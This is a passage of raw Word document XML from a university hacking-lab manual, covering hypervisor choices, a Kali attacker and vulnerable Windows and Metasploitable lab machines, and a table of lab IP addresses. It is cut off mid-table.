                <v:shape id="Picture 69" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;left:3877;top:18;width:413;height:3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">
                  <v:imagedata r:id="rId21" o:title=""/>
                </v:shape>
                <v:shape id="Picture 68" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:4357;top:18;width:413;height:3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">
                  <v:imagedata r:id="rId21" o:title=""/>
                </v:shape>
                <w10:wrap anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00280B8F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15733760" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7A4A0AFD" wp14:editId="059493AF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3105150</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>12431</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="262254" cy="250812"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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9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2254" cy="2508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80B8F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>Takeaway</w:t>
      </w:r>
      <w:r w:rsidR="00280B8F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B9930A" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="314AE437" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2121D5F1" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:spacing w:before="93" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="839" w:right="1435"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Maintenance (Manual) is now available to all students of this class to refer, add your expe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>rience and share your reflections. DON’T FORGET TO ADD YOUR NAME IN YOUR POST. Each poster will be awarded with for their work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A194EBA" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:spacing w:before="194"/>
        <w:ind w:left="839"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Link is shared in our Teams Channel!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EDF6AF" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F1D6B7E" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="9895"/>
        </w:tabs>
        <w:ind w:left="840"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B1AB65" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="122"/>
        <w:ind w:left="840"/>
      </w:pPr>
      <w:r>
        <w:t>You could use any of the following as per your convenience. Highlighted is used here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79092DCF" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="702F6285" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:ind w:hanging="361"/>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>VirtualBox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E38020" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:spacing w:before="41"/>
        <w:ind w:hanging="361"/>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>VMware Workstation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Pro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B7368D" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:spacing w:before="41"/>
        <w:ind w:hanging="361"/>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>VMware Fusion Pro (for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mac),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB47A6B" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:spacing w:before="41"/>
        <w:ind w:hanging="361"/>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>VMware ESXi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC92161" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:spacing w:before="45"/>
        <w:ind w:hanging="361"/>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Hyper-V</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72125D27" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="458C95FB" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="9895"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve">What </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>you</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>need?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D629EEB" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1559"/>
          <w:tab w:val="left" w:pos="1560"/>
          <w:tab w:val="left" w:pos="2469"/>
          <w:tab w:val="left" w:pos="3724"/>
          <w:tab w:val="left" w:pos="4751"/>
          <w:tab w:val="left" w:pos="5380"/>
          <w:tab w:val="left" w:pos="6179"/>
          <w:tab w:val="left" w:pos="7511"/>
          <w:tab w:val="left" w:pos="8719"/>
          <w:tab w:val="left" w:pos="9148"/>
        </w:tabs>
        <w:spacing w:before="118"/>
        <w:ind w:left="1559" w:right="1432"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Virtual</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Machines</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>running</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(Attacker)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>7/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">XP/10, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Metasploitable 2.0.0, Windows Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2016.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7763F5" w14:textId="74CA043D" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1559"/>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:spacing w:before="122"/>
        <w:ind w:hanging="36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 wp14:anchorId="2FF25925" wp14:editId="42A95260">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>694055</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1129665</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6866255" cy="0"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="89" name="Lin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662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23B940" id="Line 66" o:spid="_x0000_s1026" style="position:absolute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4.65pt,88.95pt" to="595.3pt,8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">
                <w10:wrap anchorx="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00280B8F">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Internet access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E426586" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="008B5358">
          <w:headerReference w:type="default" r:id="rId22"/>
          <w:footerReference w:type="default" r:id="rId23"/>
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1340" w:right="0" w:bottom="1300" w:left="600" w:header="708" w:footer="1119" w:gutter="0"/>
          <w:pgNumType w:start="2"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="543DB65F" w14:textId="79997C48" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
      <w:pPr>
        <w:spacing w:before="82"/>
        <w:ind w:left="3304" w:right="1444" w:hanging="2446"/>
        <w:rPr>
          <w:b/>
          <w:sz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36320" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7F52BF99" wp14:editId="45D0E2CC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>694055</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>9727565</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6866255" cy="0"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="88" name="Lin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662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5C5657" id="Line 65" o:spid="_x0000_s1026" style="position:absolute;z-index:1573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4.65pt,765.95pt" to="595.3pt,76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">
                <w10:wrap anchorx="page" anchory="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00280B8F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t>The configurations/ ip addressing below listed is based on this topology. Make</w:t>
      </w:r>
      <w:r w:rsidR="00280B8F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00280B8F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t>necessary changes as you work on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8A3B8B" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="781B25F3" w14:textId="291B9EAB" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="11" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="248D44A6" wp14:editId="5A8F55B7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1033146</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>166428</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1241049" cy="741806"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="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1049" cy="7418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2" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="47D83D46" wp14:editId="4DB38091">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2500629</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>194978</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1241050" cy="741806"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1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1050" cy="7418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3" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7A582838" wp14:editId="230BDB9D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3947795</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>195003</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1241050" cy="741806"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1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1050" cy="7418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E4E04">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487595008" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="18F4E5D6" wp14:editId="60A4B0B3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>5292090</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>194310</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1228090" cy="734060"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="85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28090" cy="734060"/>
                          <a:chOff x="8334" y="306"/>
                          <a:chExt cx="1934" cy="1156"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="86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15" y="337"/>
                            <a:ext cx="807" cy="8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7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34" y="306"/>
                            <a:ext cx="1934" cy="11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41C25D" id="Group 62" o:spid="_x0000_s1026" style="position:absolute;margin-left:416.7pt;margin-top:15.3pt;width:96.7pt;height:57.8pt;z-index:-15721472;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="8334,306" coordsize="1934,11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">
                <v:shape id="Picture 64" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;left:8515;top:337;width:807;height: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">
                  <v:imagedata r:id="rId26" o:title=""/>
                </v:shape>
                <v:shape id="Picture 63" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:8334;top:306;width:1934;height:11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">
                  <v:imagedata r:id="rId27" o:title=""/>
                </v:shape>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="448BCF0B" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4292A4E6" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ECCE579" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="658C053B" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="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18"/>
        <w:gridCol w:w="2318"/>
        <w:gridCol w:w="2013"/>
        <w:gridCol w:w="2366"/>
      </w:tblGrid>
      <w:tr w:rsidR="008B5358" w14:paraId="3CC53F44" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="515"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2318" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47B1A411" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="695"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="thick"/>
              </w:rPr>
              <w:t>Win 7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2318" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04EFEEC8" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="746"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="thick"/>
              </w:rPr>
              <w:t>Win XP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03A81087" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="305" w:right="296"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="thick"/>
              </w:rPr>
              <w:t>Win Sr 2016</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2366" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="618EC26A" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="660" w:right="653"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="thick"/>
              </w:rPr>
              <w:t>Kali</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B5358" w14:paraId="24DFBB45" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="515"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2318" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7618D69C" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="695"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="thick"/>
              </w:rPr>
              <w:t>10.0.2.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2318" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31EE26BE" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0"/>
              <w:ind w:left="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18511B78" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="304" w:right="296"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="thick"/>
              </w:rPr>
              <w:t>10.0.2.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2366" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A979944" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="661" w:right="653"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="thick"/>
              </w:rPr>
              <w:t>10.0.2.15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B5358" w14:paraId="1F744798" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="518"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2318" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="361FF965" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
            <w:pPr>
